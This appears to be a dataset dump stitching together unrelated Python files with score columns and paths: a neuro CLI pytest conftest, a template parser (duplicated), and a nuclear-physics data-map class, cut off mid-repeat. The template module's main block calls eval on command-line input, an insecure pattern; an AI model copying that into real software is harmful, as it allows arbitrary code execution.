SysCapWithCode = namedtuple("SysCapWithCode", ["out", "err", "code"])
log = logging.getLogger(__name__)
@pytest.fixture()
def nmrc_path(tmp_path: Path, token: str, auth_config: _AuthConfig) -> Path:
nmrc_path = tmp_path / "conftest.nmrc"
cluster_config = Cluster(
registry_url=URL("https://registry-dev.neu.ro"),
storage_url=URL("https://storage-dev.neu.ro"),
users_url=URL("https://users-dev.neu.ro"),
monitoring_url=URL("https://monitoring-dev.neu.ro"),
secrets_url=URL("https://secrets-dev.neu.ro"),
disks_url=URL("https://disks-dev.neu.ro"),
buckets_url=URL("https://buckets-dev.neu.ro"),
presets={
"gpu-small": Preset(
credits_per_hour=Decimal("10"),
cpu=7,
memory_mb=30 * 1024,
gpu=1,
gpu_model="nvidia-tesla-k80",
),
"gpu-large": Preset(
credits_per_hour=Decimal("10"),
cpu=7,
memory_mb=60 * 1024,
gpu=1,
gpu_model="nvidia-tesla-v100",
),
"cpu-small": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=2 * 1024
),
"cpu-large": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=14 * 1024
),
},
name="default",
orgs=[None],
)
cluster2_config = Cluster(
registry_url=URL("https://registry2-dev.neu.ro"),
storage_url=URL("https://storage2-dev.neu.ro"),
users_url=URL("https://users2-dev.neu.ro"),
monitoring_url=URL("https://monitoring2-dev.neu.ro"),
secrets_url=URL("https://secrets2-dev.neu.ro"),
disks_url=URL("https://disks2-dev.neu.ro"),
buckets_url=URL("https://buckets2-dev.neu.ro"),
presets={
"cpu-small": Preset(
credits_per_hour=Decimal("10"), cpu=7, memory_mb=2 * 1024
),
},
name="other",
orgs=[None],
)
config = _ConfigData(
auth_config=auth_config,
auth_token=_AuthToken.create_non_expiring(token),
url=URL("https://dev.neu.ro/api/v1"),
admin_url=URL("https://dev.neu.ro/apis/admin/v1"),
version=__version__,
cluster_name=cluster_config.name,
org_name=cluster_config.orgs[0],
clusters={
cluster_config.name: cluster_config,
cluster2_config.name: cluster2_config,
},
)
Factory(nmrc_path)._save(config)
return nmrc_path
def create_root(config_path: Path) -> Root:
async def cmd() -> None:
pass
return Root(
color=False,
tty=False,
disable_pypi_version_check=True,
network_timeout=60,
config_path=config_path,
verbosity=0,
trace=False,
trace_hide_token=True,
force_trace_all=False,
command_path="",
command_params=[],
skip_gmp_stats=True,
show_traceback=False,
iso_datetime_format=False,
ctx=Context(Command(cmd, name="")),
)
@pytest.fixture()
def root(nmrc_path: Path) -> Iterator[Root]:
root = create_root(config_path=nmrc_path)
root.run(root.init_client())
yield root
root.close()
@pytest.fixture()
def root_no_logged_in(tmp_path: Path) -> Iterator[Root]:
root = create_root(config_path=tmp_path)
assert root._client is None
yield root
assert root._client is None
root.close()
@pytest.fixture()
def run_cli(
nmrc_path: Path, capfd: Any, tmp_path: Path
) -> Callable[[List[str]], SysCapWithCode]:
def _run_cli(arguments: List[str]) -> SysCapWithCode:
log.info("Run 'neuro %s'", " ".join(arguments))
capfd.readouterr()
code = EX_OK
try:
default_args = [
"--show-traceback",
"--disable-pypi-version-check",
"--color=no",
]
if "--neuromation-config" not in arguments:
for arg in arguments:
if arg.startswith("--neuromation-config="):
break
else:
default_args.append(f"--neuromation-config={nmrc_path}")
main(default_args + arguments)
except SystemExit as e:
code = e.code
pass
out, err = capfd.readouterr()
return SysCapWithCode(out.strip(), err.strip(), code)
return _run_cli
@pytest.fixture()
def click_tty_emulation(monkeypatch: Any) -> None:
monkeypatch.setattr("click._compat.isatty", lambda stream: True)
@dataclasses.dataclass(eq=False)
class Guard:
arg: str
path: Path
def __eq__(self, other: object) -> bool:
if not isinstance(other, Guard):
return NotImplemented
return [s.rstrip() for s in self.arg.splitlines()] == [
s.rstrip() for s in other.arg.splitlines()
]
class RichComparator:
def __init__(self, config: Any) -> None:
self._regen = config.getoption("--rich-gen")
self._config = config
self._reporter = config.pluginmanager.getplugin("terminalreporter")
assert self._reporter is not None
self._cwd = Path.cwd()
self._written_refs: List[Path] = []
self._checked_refs: Set[Path] = set()
self._file_pos = DefaultDict[io.StringIO, int](int)
def mkref(self, request: Any, index: Optional[int]) -> Path:
folder = Path(request.fspath).parent
basename = request.function.__qualname__
if hasattr(request.node, "callspec"):
parametrize_id = request.node.callspec.id
# Some characters are forbidden in FS path (on Windows)
bad_to_good = {
"/": "#forward_slash#",
"\\": "#back_slash#",
"<": "#less#",
">": "#more#",
":": "#colon#",
'"': "#double_qoute#",
"|": "#vertical_bar#",
"?": "#question_mark#",
"*": "#star#",
}
for bad, good in bad_to_good.items():
parametrize_id = parametrize_id.replace(bad, good)
# On windows, some characters are forbidden
basename += f"[{parametrize_id}]"
if index is not None:
basename += "_" + str(index)
basename += ".ref"
return folder / "ascii" / basename
def rel(self, ref: Path) -> Path:
return ref.relative_to(self._cwd)
def check_io(self, ref: Path, file: io.StringIO) -> None:
__tracebackhide__ = True
tmp = file.getvalue()
buf = tmp[self._file_pos[file] :]
self._file_pos[file] = len(tmp)
self.check(ref, buf)
def check(self, ref: Path, buf: str) -> None:
__tracebackhide__ = True
if ref in self._checked_refs:
pytest.fail(
f"{self.rel(ref)} is already checked. "
"Hint: use index when generating refs automatically"
)
else:
self._checked_refs.add(ref)
buf = buf.strip()
buf = click.unstyle(buf)
if self._regen:
self.write_ref(ref, buf)
else:
orig = self.read_ref(ref)
tmp = ref.with_suffix(".orig")
self.write_file(tmp, buf)
# reading from file is important, file writer replaces \r with \n
actual = self.read_file(tmp)
assert Guard(actual, tmp) == Guard(orig, ref)
def read_file(self, ref: Path) -> str:
return ref.read_text(encoding="utf8").strip()
def read_ref(self, ref: Path) -> str:
__tracebackhide__ = True
if not ref.exists():
rel_ref = self.rel(ref)
pytest.fail(
f"The reference {rel_ref} doesn't exist.\n"
"Create it yourself or run pytest with '--rich-gen' option."
)
else:
return self.read_file(ref)
def write_file(self, ref: Path, buf: str) -> None:
ref.parent.mkdir(parents=True, exist_ok=True)
ref.write_text(buf.strip() + "\n", encoding="utf8")
def write_ref(self, ref: Path, buf: str) -> bool:
if ref.exists():
orig = ref.read_text().strip()
if orig == buf:
return False
self.write_file(ref, buf)
if self._reporter.verbosity > 0:
rel_ref = self.rel(ref)
self._reporter.write_line(f"Regenerate {rel_ref}", yellow=True)
self._written_refs.append(ref)
return True
def summary(self) -> None:
if self._reporter.verbosity == 0:
if self._written_refs:
self._reporter.write_line("Regenerated files:", yellow=True)
for fname in self._written_refs:
rel_ref = self.rel(fname)
self._reporter.write_line(f" {rel_ref}", yellow=True)
def diff(self, lft: Guard, rgt: Guard) -> List[str]:
# The same as _diff_text from
# pytest/assertion/util.py#L200-L245
# plus a few extra lines with additional instructions.
explanation: List[str] = []
left = lft.arg
right = rgt.arg
if self._reporter.verbosity < 1:
i = 0 # just in case left or right has zero length
for i in range(min(len(left), len(right))):
if left[i] != right[i]:
break
if i > 42:
i -= 10 # Provide some context
explanation = [
"Skipping %s identical leading characters in diff, use -v to show"
% i
]
left = left[i:]
right = right[i:]
if len(left) == len(right):
for i in range(len(left)):
if left[-i] != right[-i]:
break
if i > 42:
i -= 10 # Provide some context
explanation += [
"Skipping {} identical trailing "
"characters in diff, use -v to show".format(i)
]
left = left[:-i]
right = right[:-i]
keepends = True
if left.isspace() or right.isspace():
left = repr(str(left))
right = repr(str(right))
explanation += [
"Strings contain only whitespace, escaping them using repr()"
]
# "right" is the expected base against which we compare "left",
# see https://github.com/pytest-dev/pytest/issues/3333
explanation += [
line.strip("\n")
for line in ndiff(right.splitlines(keepends), left.splitlines(keepends))
]
explanation.append("")
explanation.append(f"'cat {self.rel(lft.path)}' to see the test output.")
explanation.append(f"'cat {self.rel(rgt.path)}' to see the reference.")
explanation.append(
f"Use 'pytest ... --rich-gen' to regenerate reference files "
"from values calculated by tests"
)
return explanation
def pytest_assertrepr_compare(
config: Any, op: str, left: object, right: object
) -> Optional[List[str]]:
if isinstance(left, Guard) and isinstance(right, Guard):
plugin = config.pluginmanager.getplugin("rich-comparator")
return plugin.diff(left, right)
return None
# run after terminalreporter/capturemanager are configured
@pytest.hookimpl(trylast=True)
def pytest_configure(config: Any) -> None:
comparator = RichComparator(config)
config.pluginmanager.register(comparator, "rich-comparator")
def pytest_terminal_summary(terminalreporter: Any) -> None:
config = terminalreporter.config
comparator = config.pluginmanager.getplugin("rich-comparator")
comparator.summary()
@pytest.fixture
def rich_cmp(request: Any) -> Callable[..., None]:
def comparator(
src: Union[RenderableType, Console],
ref: Optional[Path] = None,
*,
color: bool = True,
tty: bool = True,
index: Optional[int] = 0,
) -> None:
__tracebackhide__ = True
plugin = request.config.pluginmanager.getplugin("rich-comparator")
if ref is None:
ref = plugin.mkref(request, index)
if isinstance(src, io.StringIO):
plugin.check_io(ref, src)
elif isinstance(src, Console):
if isinstance(src.file, io.StringIO):
plugin.check_io(ref, src.file)
else:
buf = src.export_text(clear=True, styles=True)
plugin.check(ref, buf)
else:
file = io.StringIO()
console = Console(
file=file,
width=160,
height=24,
force_terminal=tty,
color_system="auto" if color else None,
record=True,
highlighter=None,
legacy_windows=False,
)
console.print(src)
plugin.check_io(ref, file)
return comparator
NewConsole = Callable[..., Console]
@pytest.fixture
def new_console() -> NewConsole:
def factory(*, tty: bool, color: bool = True) -> Console:
file = io.StringIO()
# console doesn't accept the time source,
# using the real time in tests is not reliable
return Console(
file=file,
width=160,
height=24,
force_terminal=tty,
color_system="auto" if color else None,
record=True,
highlighter=None,
legacy_windows=False,
log_path=False,
log_time=False,
)
return factory | 0.610918 | 0.205456 |
import inspect
import io
from abc import ABCMeta, abstractmethod
from PySide.QtGui import QApplication
if __package__:
from . import functions
else:
import functions
class TemplateError(Exception):
pass
class Renderable(metaclass=ABCMeta):
@abstractmethod
def render(self, context):
pass
class Text(Renderable):
def __init__(self, text):
self.text = text
def render(self, context):
return self.text
def __repr__(self):
return repr(self.text)
class Variable(Renderable):
def __init__(self, name):
self.name = name
def render(self, context):
return context.get(self.name, '')
def __repr__(self):
return 'Variable: %s' % self.name
class Block(Renderable):
def __init__(self):
self.elements = []
def append(self, elem):
self.elements.append(elem)
def isempty(self):
return len(self.elements) == 0
def render(self, context):
return ''.join(e.render(context) for e in self.elements)
def __repr__(self):
return '\n'.join(repr(e) for e in self.elements)
class BaseFunction(Renderable):
def __init__(self, function, args):
self.function = function
self.args = args
def get_arg(self, arg, context):
return arg.render(context)
def get_args(self, context):
return [self.get_arg(a, context) for a in self.args]
def render(self, context):
return self.function(*self.get_args(context))
def __repr__(self):
return (self.__class__.__name__ + ': ' + self.function.__name__ + '(\n ' +
',\n'.join(repr(a) for a in self.args).replace('\n', '\n ') + '\n)')
class Function(BaseFunction):
pass
class LazyFunction(BaseFunction):
def get_arg(self, arg, context):
return lambda s=super(): s.get_arg(arg, context)
class ContextFunction(BaseFunction):
def get_args(self, context):
return [context] + super().get_args(context)
class LazyContextFunction(ContextFunction, LazyFunction):
pass
class FunctionRepo:
def __init__(self, modules, parent=None):
self.parent = parent
self.data = {}
for module in modules:
for name in dir(module):
function = getattr(module, name)
if name.startswith('f_'):
cls = Function
name = name[2:]
elif name.startswith('lazy_'):
cls = LazyFunction
name = name[5:]
elif name.startswith('context_'):
cls = ContextFunction
name = name[8:]
elif name.startswith('lazycontext_'):
cls = LazyContextFunction
name = name[12:]
else:
continue
min_args = 0
max_args = 0
try:
sig = inspect.signature(function)
except ValueError:
raise TemplateError("Can't obtain signature for function '%s' from %r" % (name, module))
for p in sig.parameters.values():
if (p.kind == inspect.Parameter.POSITIONAL_ONLY or
p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD):
if max_args is not None:
max_args += 1
if p.default == inspect.Parameter.empty:
min_args += 1
elif p.kind == inspect.Parameter.VAR_POSITIONAL:
max_args = None
elif (p.kind == inspect.Parameter.KEYWORD_ONLY and
p.default == inspect.Parameter.empty):
raise TemplateError("Required keyword-only arguments are not allowed: "
"function '%s' from %r" % (name, module))
if cls == ContextFunction or cls == LazyContextFunction:
if max_args is not None and max_args < 1:
raise TemplateError("Context function must accept at least one argument: "
"function '%s' from %r" % (name, module))
min_args -= max(min_args - 1, 0)
max_args -= 1
self.data[name] = (function, cls, min_args, max_args)
def get(self, name):
data = self.data.get(name, None)
if data is None:
if self.parent is None:
data = (None, None, None, None)
else:
data = self.parent.get(name)
return data
std_function_repo = FunctionRepo([functions])
class Parser:
VAR = '%'
FUNC = '$'
FUNC_START = '('
FUNC_COMMA = ','
FUNC_END = ')'
ESC = '\\'
def __init__(self, source, function_repo):
self.source = source
self._function_repo = function_repo
self._pos = -1
self._line = 1
self._col = 0
def _get(self):
self._oldpos = self._pos
self._oldcol = self._col
self._oldline = self._line
self._pos += 1
self._col += 1
if self._pos >= len(self.source):
return None
c = self.source[self._pos]
if c == '\n':
self._line += 1
self._col = 0
return c
def _unget(self):
assert self._pos >= 0
self._pos = self._oldpos
self._col = self._oldcol
self._line = self._oldline
def _parse_identifier(self):
s = io.StringIO()
while True:
c = self._get()
if 'a' <= c <= 'z' or 'A' <= c <= 'Z' or '0' <= c <= '9' or c == '_':
s.write(c)
elif c is None:
return s.getvalue()
else:
self._unget()
return s.getvalue()
def _parse_text(self, as_argument=False):
s = io.StringIO()
while True:
c = self._get()
if c is None:
return Text(s.getvalue())
elif c == self.VAR or c == self.FUNC or (
as_argument and (c == self.FUNC_COMMA or c == self.FUNC_END)):
self._unget()
return Text(s.getvalue())
elif c == self.ESC:
c = self._get()
if c is not None:
s.write(c)
else:
s.write(c)
def _parse_var(self):
name = self._parse_identifier()
if name == '':
raise self._error('Syntax error: empty variable name')
c = self._get()
if c != self.VAR:
raise self._error('Syntax error: undelimited variable')
return Variable(name)
def _parse_block(self, as_argument=False):
elems = Block()
while True:
c = self._get()
if c is None:
return elems
elif c == self.VAR:
elems.append(self._parse_var())
elif c == self.FUNC:
elems.append(self._parse_func())
elif as_argument and (c == self.FUNC_COMMA or c == self.FUNC_END):
self._unget()
return elems
else:
self._unget()
elems.append(self._parse_text(as_argument))
def _parse_func(self):
name = self._parse_identifier()
if name == '':
raise self._error('Syntax error: empty function name')
c = self._get()
if c != self.FUNC_START:
raise self._error("Syntax error: expected '('")
args = []
while True:
args.append(self._parse_block(True))
c = self._get()
if c == self.FUNC_END:
break
elif c != self.FUNC_COMMA:
raise self._error("Syntax error: expected ',' or ')'")
if len(args) == 1 and args[0].isempty():
args = []
f, NodeClass, min_args, max_args = self._function_repo.get(name)
if f is None:
raise self._error("Unknown function: '%s'" % name)
if len(args) < min_args:
raise self._error("Function '%s' expects at least %d arguments, "
"%d given" % (name, min_args, len(args)))
if max_args is not None and len(args) > max_args:
raise self._error("Function '%s' expects at most %d arguments, "
"%d given" % (name, max_args, len(args)))
return NodeClass(f, args)
def parse(self):
return self._parse_block()
def _error(self, msg):
return TemplateError(msg)
class Template(Renderable):
std_vars = {
'__timefmt__': (
QApplication.translate('templates', '{}{}d {:02d}:{:02d}:{:02d}'),
QApplication.translate('templates', '{}{}:{:02d}:{:02d}'),
QApplication.translate('templates', '{}{:02d}:{:02d}'),
),
}
def __init__(self, source, function_modules=[]):
if len(function_modules) > 0:
repo = FunctionRepo(function_modules, std_function_repo)
else:
repo = std_function_repo
self._block = Parser(source, repo).parse()
def render(self, context):
for k, v in self.std_vars.items():
context.setdefault(k, v)
return self._block.render(context)
def __repr__(self):
return repr(self._block)
if __name__ == '__main__':
import sys
t = Template(sys.argv[1])
print(repr(t))
if len(sys.argv) >= 3:
print(repr(t.render(eval(sys.argv[2])))) | qygmy/templates/template.py |
import inspect
import io
from abc import ABCMeta, abstractmethod
from PySide.QtGui import QApplication
if __package__:
from . import functions
else:
import functions
class TemplateError(Exception):
pass
class Renderable(metaclass=ABCMeta):
@abstractmethod
def render(self, context):
pass
class Text(Renderable):
def __init__(self, text):
self.text = text
def render(self, context):
return self.text
def __repr__(self):
return repr(self.text)
class Variable(Renderable):
def __init__(self, name):
self.name = name
def render(self, context):
return context.get(self.name, '')
def __repr__(self):
return 'Variable: %s' % self.name
class Block(Renderable):
def __init__(self):
self.elements = []
def append(self, elem):
self.elements.append(elem)
def isempty(self):
return len(self.elements) == 0
def render(self, context):
return ''.join(e.render(context) for e in self.elements)
def __repr__(self):
return '\n'.join(repr(e) for e in self.elements)
class BaseFunction(Renderable):
def __init__(self, function, args):
self.function = function
self.args = args
def get_arg(self, arg, context):
return arg.render(context)
def get_args(self, context):
return [self.get_arg(a, context) for a in self.args]
def render(self, context):
return self.function(*self.get_args(context))
def __repr__(self):
return (self.__class__.__name__ + ': ' + self.function.__name__ + '(\n ' +
',\n'.join(repr(a) for a in self.args).replace('\n', '\n ') + '\n)')
class Function(BaseFunction):
pass
class LazyFunction(BaseFunction):
def get_arg(self, arg, context):
return lambda s=super(): s.get_arg(arg, context)
class ContextFunction(BaseFunction):
def get_args(self, context):
return [context] + super().get_args(context)
class LazyContextFunction(ContextFunction, LazyFunction):
pass
class FunctionRepo:
def __init__(self, modules, parent=None):
self.parent = parent
self.data = {}
for module in modules:
for name in dir(module):
function = getattr(module, name)
if name.startswith('f_'):
cls = Function
name = name[2:]
elif name.startswith('lazy_'):
cls = LazyFunction
name = name[5:]
elif name.startswith('context_'):
cls = ContextFunction
name = name[8:]
elif name.startswith('lazycontext_'):
cls = LazyContextFunction
name = name[12:]
else:
continue
min_args = 0
max_args = 0
try:
sig = inspect.signature(function)
except ValueError:
raise TemplateError("Can't obtain signature for function '%s' from %r" % (name, module))
for p in sig.parameters.values():
if (p.kind == inspect.Parameter.POSITIONAL_ONLY or
p.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD):
if max_args is not None:
max_args += 1
if p.default == inspect.Parameter.empty:
min_args += 1
elif p.kind == inspect.Parameter.VAR_POSITIONAL:
max_args = None
elif (p.kind == inspect.Parameter.KEYWORD_ONLY and
p.default == inspect.Parameter.empty):
raise TemplateError("Required keyword-only arguments are not allowed: "
"function '%s' from %r" % (name, module))
if cls == ContextFunction or cls == LazyContextFunction:
if max_args is not None and max_args < 1:
raise TemplateError("Context function must accept at least one argument: "
"function '%s' from %r" % (name, module))
min_args -= max(min_args - 1, 0)
max_args -= 1
self.data[name] = (function, cls, min_args, max_args)
def get(self, name):
data = self.data.get(name, None)
if data is None:
if self.parent is None:
data = (None, None, None, None)
else:
data = self.parent.get(name)
return data
std_function_repo = FunctionRepo([functions])
class Parser:
VAR = '%'
FUNC = '$'
FUNC_START = '('
FUNC_COMMA = ','
FUNC_END = ')'
ESC = '\\'
def __init__(self, source, function_repo):
self.source = source
self._function_repo = function_repo
self._pos = -1
self._line = 1
self._col = 0
def _get(self):
self._oldpos = self._pos
self._oldcol = self._col
self._oldline = self._line
self._pos += 1
self._col += 1
if self._pos >= len(self.source):
return None
c = self.source[self._pos]
if c == '\n':
self._line += 1
self._col = 0
return c
def _unget(self):
assert self._pos >= 0
self._pos = self._oldpos
self._col = self._oldcol
self._line = self._oldline
def _parse_identifier(self):
s = io.StringIO()
while True:
c = self._get()
if 'a' <= c <= 'z' or 'A' <= c <= 'Z' or '0' <= c <= '9' or c == '_':
s.write(c)
elif c is None:
return s.getvalue()
else:
self._unget()
return s.getvalue()
def _parse_text(self, as_argument=False):
s = io.StringIO()
while True:
c = self._get()
if c is None:
return Text(s.getvalue())
elif c == self.VAR or c == self.FUNC or (
as_argument and (c == self.FUNC_COMMA or c == self.FUNC_END)):
self._unget()
return Text(s.getvalue())
elif c == self.ESC:
c = self._get()
if c is not None:
s.write(c)
else:
s.write(c)
def _parse_var(self):
name = self._parse_identifier()
if name == '':
raise self._error('Syntax error: empty variable name')
c = self._get()
if c != self.VAR:
raise self._error('Syntax error: undelimited variable')
return Variable(name)
def _parse_block(self, as_argument=False):
elems = Block()
while True:
c = self._get()
if c is None:
return elems
elif c == self.VAR:
elems.append(self._parse_var())
elif c == self.FUNC:
elems.append(self._parse_func())
elif as_argument and (c == self.FUNC_COMMA or c == self.FUNC_END):
self._unget()
return elems
else:
self._unget()
elems.append(self._parse_text(as_argument))
def _parse_func(self):
name = self._parse_identifier()
if name == '':
raise self._error('Syntax error: empty function name')
c = self._get()
if c != self.FUNC_START:
raise self._error("Syntax error: expected '('")
args = []
while True:
args.append(self._parse_block(True))
c = self._get()
if c == self.FUNC_END:
break
elif c != self.FUNC_COMMA:
raise self._error("Syntax error: expected ',' or ')'")
if len(args) == 1 and args[0].isempty():
args = []
f, NodeClass, min_args, max_args = self._function_repo.get(name)
if f is None:
raise self._error("Unknown function: '%s'" % name)
if len(args) < min_args:
raise self._error("Function '%s' expects at least %d arguments, "
"%d given" % (name, min_args, len(args)))
if max_args is not None and len(args) > max_args:
raise self._error("Function '%s' expects at most %d arguments, "
"%d given" % (name, max_args, len(args)))
return NodeClass(f, args)
def parse(self):
return self._parse_block()
def _error(self, msg):
return TemplateError(msg)
class Template(Renderable):
std_vars = {
'__timefmt__': (
QApplication.translate('templates', '{}{}d {:02d}:{:02d}:{:02d}'),
QApplication.translate('templates', '{}{}:{:02d}:{:02d}'),
QApplication.translate('templates', '{}{:02d}:{:02d}'),
),
}
def __init__(self, source, function_modules=[]):
if len(function_modules) > 0:
repo = FunctionRepo(function_modules, std_function_repo)
else:
repo = std_function_repo
self._block = Parser(source, repo).parse()
def render(self, context):
for k, v in self.std_vars.items():
context.setdefault(k, v)
return self._block.render(context)
def __repr__(self):
return repr(self._block)
if __name__ == '__main__':
import sys
t = Template(sys.argv[1])
print(repr(t))
if len(sys.argv) >= 3:
print(repr(t.render(eval(sys.argv[2])))) | 0.364099 | 0.132936 |
from __future__ import print_function, division, unicode_literals
from deprecated.ncsm_vce_lpt.parser import exp
from deprecated.nushellx_lpt.DataMapNushellxLpt import DataMapNushellxLpt
from constants import FN_PARSE_LPT_RGX_FNAME as _RGX_FNAME
from constants import FN_PARSE_NCSMVCE_LPT_RGX_DNAME as _RGX_DNAME_GGP
from deprecated.ncsm_vce_lpt.ExpNcsmVceLpt import ExpNcsmVceLpt
class DataMapNcsmVceLpt(DataMapNushellxLpt):
"""Data type that stores a map to *.lpt file data, generated by NuShellX
on interaction files from a VCE of NCSM results
"""
# noinspection PyUnusedLocal
def __init__(
self, parent_directory, exp_list=None, exp_filter_fn=None, **kwargs
):
"""Initialize the DataMap in the given parent_directory
:param parent_directory: directory in which to recursively retrieve
files
:param exp_list: list of exp for which to gather data
:param exp_filter_fn: function with which to filter files by their exp
:param kwargs: other arguments to pass to DatumLpt
"""
super(DataMapNcsmVceLpt, self).__init__(
parent_directory=parent_directory,
exp_list=exp_list, exp_filter_fn=exp_filter_fn,
_exp_type=ExpNcsmVceLpt,
_rgx_fname_lpt=_RGX_FNAME,
_rgx_dname_ggparent_dir=_RGX_DNAME_GGP
)
def _exp_from_file_path(self, f):
return exp(filepath=f)
# todo: Only a mother could love this ugly method. There should be a
# todo: better way to do this without passing all of these parameters
def aeff_eq_a_to_n_to_j_energy_map(
self, z, nmax, n1, n2, nshell, ncomponent, scalefactor=None,
incl_proton=True,
):
"""Returns a map
Aeff=A -> N -> (J, Energy)
where the Energy is that associated with index N from the lpt file
with the addition of the zero body term for the
prescription (A, A, A) with mass A.
:param z: proton number (Z)
:param nmax: oscillator truncation
:param n1: one-particle TBME interaction truncation
:param n2: two-particle TBME interaction truncation
:param nshell: major oscillator shell (0=s, 1=p, 2=sd, ...)
:param ncomponent: 1 -> neutrons, 2 -> protons & neutrons
:param scalefactor: factor by which off-diagonal coupling terms in
the interaction were scaled
:param incl_proton: whether or not proton interaction was included.
"""
a_to_n_to_energy_map = dict()
for exp0 in self.map.keys():
presc = exp0.A_presc
if not (presc[0] == presc[1] == presc[2]):
continue
elif exp0.Z != z or exp0.Nmax != nmax:
continue
elif exp0.n1 != n1 or exp0.n2 != n2:
continue
elif exp0.nshell != nshell or exp0.ncomponent != ncomponent:
continue
elif exp0.scale != scalefactor or exp0.incl_proton != incl_proton:
continue
else:
a = presc[0]
dat = self[exp0]
mass_to_zbt_map = dat.mass_to_zbt_map()
mass_to_ex_states_map = dat.mass_to_ex_states_map()
if a in mass_to_zbt_map and a in mass_to_ex_states_map:
if a not in a_to_n_to_energy_map:
a_to_n_to_energy_map[a] = dict()
zbt = mass_to_zbt_map[a]
for ex_state in mass_to_ex_states_map[a]:
j = ex_state.J
e = ex_state.E + zbt
a_to_n_to_energy_map[a][ex_state.N] = (j, e)
else:
continue
return a_to_n_to_energy_map
# todo: Only a mother could love this ugly method. There should be a
# todo: better way to do this without passing all of these parameters
def aeff_eq_a_to_ground_energy_map(
self, z, nmax, n1, n2, nshell, ncomponent, scalefactor=None,
incl_proton=True,
):
"""Returns a map
Aeff=A -> Ground energy
where the ground energy is that from the lpt file for the prescription
(A, A, A) with mass A.
:param z: proton number (Z)
:param nmax: oscillator truncation
:param n1: one-particle TBME interaction truncation
:param n2: two-particle TBME interaction truncation
:param nshell: major oscillator shell (0=s, 1=p, 2=sd, ...)
:param ncomponent: 1 -> neutrons, 2 -> protons & neutrons
:param scalefactor: factor by which off-diagonal coupling terms in
the interaction were scaled
:param incl_proton: whether or not proton interaction was included.
"""
aeff_eq_a_to_ground_energy = dict()
for exp0 in self.map.keys():
presc = exp0.A_presc
if not (presc[0] == presc[1] == presc[2]):
continue
elif exp0.Z != z or exp0.Nmax != nmax:
continue
elif exp0.n1 != n1 or exp0.n2 != n2:
continue
elif exp0.nshell != nshell or exp0.ncomponent != ncomponent:
continue
elif exp0.scale != scalefactor or exp0.incl_proton != incl_proton:
continue
else:
a = presc[0]
dat = self[exp0]
ground_energy_map = dat.mass_to_ground_energy_map(nshell=nshell)
if a in ground_energy_map:
ground_energy = ground_energy_map[a]
aeff_eq_a_to_ground_energy[a] = ground_energy
else:
continue
return aeff_eq_a_to_ground_energy | src/deprecated/ncsm_vce_lpt/DataMapNcsmVceLpt.py | from __future__ import print_function, division, unicode_literals
from deprecated.ncsm_vce_lpt.parser import exp
from deprecated.nushellx_lpt.DataMapNushellxLpt import DataMapNushellxLpt
from constants import FN_PARSE_LPT_RGX_FNAME as _RGX_FNAME
from constants import FN_PARSE_NCSMVCE_LPT_RGX_DNAME as _RGX_DNAME_GGP
from deprecated.ncsm_vce_lpt.ExpNcsmVceLpt import ExpNcsmVceLpt
class DataMapNcsmVceLpt(DataMapNushellxLpt):
"""Data type that stores a map to *.lpt file data, generated by NuShellX
on interaction files from a VCE of NCSM results
"""
# noinspection PyUnusedLocal
def __init__(
self, parent_directory, exp_list=None, exp_filter_fn=None, **kwargs
):
"""Initialize the DataMap in the given parent_directory
:param parent_directory: directory in which to recursively retrieve
files
:param exp_list: list of exp for which to gather data
:param exp_filter_fn: function with which to filter files by their exp
:param kwargs: other arguments to pass to DatumLpt
"""
super(DataMapNcsmVceLpt, self).__init__(
parent_directory=parent_directory,
exp_list=exp_list, exp_filter_fn=exp_filter_fn,
_exp_type=ExpNcsmVceLpt,
_rgx_fname_lpt=_RGX_FNAME,
_rgx_dname_ggparent_dir=_RGX_DNAME_GGP
)
def _exp_from_file_path(self, f):
return exp(filepath=f)
# todo: Only a mother could love this ugly method. There should be a
# todo: better way to do this without passing all of these parameters
def aeff_eq_a_to_n_to_j_energy_map(
self, z, nmax, n1, n2, nshell, ncomponent, scalefactor=None,
incl_proton=True,
):
"""Returns a map
Aeff=A -> N -> (J, Energy)
where the Energy is that associated with index N from the lpt file
with the addition of the zero body term for the
prescription (A, A, A) with mass A.
:param z: proton number (Z)
:param nmax: oscillator truncation
:param n1: one-particle TBME interaction truncation
:param n2: two-particle TBME interaction truncation
:param nshell: major oscillator shell (0=s, 1=p, 2=sd, ...)
:param ncomponent: 1 -> neutrons, 2 -> protons & neutrons
:param scalefactor: factor by which off-diagonal coupling terms in
the interaction were scaled
:param incl_proton: whether or not proton interaction was included.
"""
a_to_n_to_energy_map = dict()
for exp0 in self.map.keys():
presc = exp0.A_presc
if not (presc[0] == presc[1] == presc[2]):
continue
elif exp0.Z != z or exp0.Nmax != nmax:
continue
elif exp0.n1 != n1 or exp0.n2 != n2:
continue
elif exp0.nshell != nshell or exp0.ncomponent != ncomponent:
continue
elif exp0.scale != scalefactor or exp0.incl_proton != incl_proton:
continue
else:
a = presc[0]
dat = self[exp0]
mass_to_zbt_map = dat.mass_to_zbt_map()
mass_to_ex_states_map = dat.mass_to_ex_states_map()
if a in mass_to_zbt_map and a in mass_to_ex_states_map:
if a not in a_to_n_to_energy_map:
a_to_n_to_energy_map[a] = dict()
zbt = mass_to_zbt_map[a]
for ex_state in mass_to_ex_states_map[a]:
j = ex_state.J
e = ex_state.E + zbt
a_to_n_to_energy_map[a][ex_state.N] = (j, e)
else:
continue
return a_to_n_to_energy_map
# todo: Only a mother could love this ugly method. There should be a
# todo: better way to do this without passing all of these parameters
def aeff_eq_a_to_ground_energy_map(
self, z, nmax, n1, n2, nshell, ncomponent, scalefactor=None,
incl_proton=True,
):
"""Returns a map
Aeff=A -> Ground energy
where the ground energy is that from the lpt file for the prescription
(A, A, A) with mass A.
:param z: proton number (Z)
:param nmax: oscillator truncation
:param n1: one-particle TBME interaction truncation
:param n2: two-particle TBME interaction truncation
:param nshell: major oscillator shell (0=s, 1=p, 2=sd, ...)
:param ncomponent: 1 -> neutrons, 2 -> protons & neutrons
:param scalefactor: factor by which off-diagonal coupling terms in
the interaction were scaled
:param incl_proton: whether or not proton interaction was included.
"""
aeff_eq_a_to_ground_energy = dict()
for exp0 in self.map.keys():
presc = exp0.A_presc
if not (presc[0] == presc[1] == presc[2]):
continue
elif exp0.Z != z or exp0.Nmax != nmax:
continue
elif exp0.n1 != n1 or exp0.n2 != n2:
continue
elif exp0.nshell != nshell or exp0.ncomponent != ncomponent:
continue
elif exp0.scale != scalefactor or exp0.incl_proton != incl_proton:
continue
else:
